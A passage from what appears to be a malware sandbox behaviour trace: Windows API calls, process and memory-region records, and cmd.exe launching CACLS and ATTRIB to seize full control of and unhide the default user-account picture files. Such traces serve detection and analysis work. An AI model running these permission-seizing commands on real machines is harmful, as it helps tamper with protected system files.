(lpName="=ExitCode", lpValue="00000000") returned 1 [0184.279] GetEnvironmentStringsW () returned 0x92410* [0184.279] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.279] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.279] GetEnvironmentStringsW () returned 0x92410* [0184.279] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.279] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf528 | out: lpAttributeList=0x2cf528) [0184.279] GetConsoleTitleW (in: lpConsoleTitle=0x2cf90c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.279] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.279] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.279] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.280] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0184.280] GetLastError () returned 0x2 [0184.280] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0184.280] GetLastError () returned 0x2 [0184.280] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0x8e4d8 [0184.280] FindClose (in: hFindFile=0x8e4d8 | out: hFindFile=0x8e4d8) returned 1 [0184.280] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0184.281] GetLastError () returned 0x2 [0184.281] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0x8e4d8 [0184.281] FindClose (in: hFindFile=0x8e4d8 | out: hFindFile=0x8e4d8) returned 1 [0184.281] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.281] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.281] GetConsoleTitleW (in: lpConsoleTitle=0x2cf6a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.281] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf528, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf5f0 | out: lpAttributeList=0x2cf528, lpSize=0x2cf5f0) returned 1 [0184.281] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf528, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf5e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf528, lpPreviousValue=0x0) returned 1 [0184.281] GetStartupInfoW (in: lpStartupInfo=0x2cf4e4 | out: lpStartupInfo=0x2cf4e4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.281] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.281] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf584*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf5d0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", lpProcessInformation=0x2cf5d0*(hProcess=0x4c, hThread=0x50, dwProcessId=0xcf0, dwThreadId=0xea4)) returned 1 [0184.283] CloseHandle (hObject=0x50) returned 1 [0184.283] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.283] GetEnvironmentStringsW () returned 0x92410* [0184.284] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.284] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0184.345] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cf4c4 | out: lpExitCode=0x2cf4c4*=0x0) returned 1 [0184.345] CloseHandle (hObject=0x4c) returned 1 [0184.345] _vsnwprintf (in: _Buffer=0x2cf60c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf4d0 | out: _Buffer="00000000") returned 8 [0184.345] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0184.345] GetEnvironmentStringsW () returned 0x92410* [0184.345] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.345] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.345] GetEnvironmentStringsW () returned 0x92410* [0184.345] FreeEnvironmentStringsW (penv=0x92410) returned 1 [0184.345] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf528 | out: lpAttributeList=0x2cf528) [0184.345] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.345] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.346] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.346] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0184.346] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.346] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0184.346] SetConsoleInputExeNameW () returned 0x1 [0184.346] GetConsoleOutputCP () returned 0x1b5 [0184.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.346] exit (_Code=0) Process: id = "362" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xcec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "361" os_parent_pid = "0x5d0" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26135 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26137 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26138 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26139 start_va = 0xef0000 end_va = 0xef8fff entry_point = 0xef0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26140 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26141 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26142 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26143 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 26144 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26145 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26146 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26147 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26148 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 26149 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 26150 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26151 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26152 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26153 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26154 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26155 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26156 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 519 os_tid = 0xd4c Thread: id = 520 os_tid = 0xd34 Process: id = "363" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xcf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "361" os_parent_pid = "0x5d0" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26157 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26158 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26159 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26160 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26161 start_va = 0x4b0000 end_va = 0x4b6fff entry_point = 0x4b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26162 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26163 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26164 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26165 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 26166 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26167 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26168 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26169 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26170 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 26171 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 26172 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26173 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26174 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26175 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26176 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26177 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26178 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26179 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26180 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26181 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26182 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26183 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26184 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 26185 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26186 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 521 os_tid = 0xea4 Process: id = "364" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xfd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26187 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26188 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26189 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26190 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 26191 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26192 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26193 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26194 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26195 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26196 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26199 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26200 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 26201 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 26202 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26203 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26204 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26205 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26206 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26207 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26208 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26209 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26210 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26211 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 26212 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26213 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26214 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 26215 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 26216 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26217 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 26218 start_va = 0x570000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 26219 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 26220 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 26221 start_va = 0x13f0000 end_va = 0x16befff entry_point = 0x13f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 522 os_tid = 0x5e0 [0184.416] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afc8c | out: lpSystemTimeAsFileTime=0x1afc8c*(dwLowDateTime=0xa2d1cc40, dwHighDateTime=0x1d440a9)) [0184.416] GetCurrentProcessId () returned 0xfd0 [0184.416] GetCurrentThreadId () returned 0x5e0 [0184.416] GetTickCount () returned 0x34c4b [0184.416] QueryPerformanceCounter (in: lpPerformanceCount=0x1afc84 | out: lpPerformanceCount=0x1afc84*=24120516052) returned 1 [0184.417] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0184.417] __set_app_type (_Type=0x1) [0184.417] __p__fmode () returned 0x76b331f4 [0184.417] __p__commode () returned 0x76b331fc [0184.417] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0184.417] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0184.417] GetCurrentThreadId () returned 0x5e0 [0184.417] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e0) returned 0x38 [0184.417] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0184.417] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0184.417] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.417] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0184.417] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afc1c | out: phkResult=0x1afc1c*=0x0) returned 0x2 [0184.417] VirtualQuery (in: lpAddress=0x1afc53, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.418] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0184.418] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afbec, dwLength=0x1c | out: lpBuffer=0x1afbec*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0184.418] VirtualQuery (in: 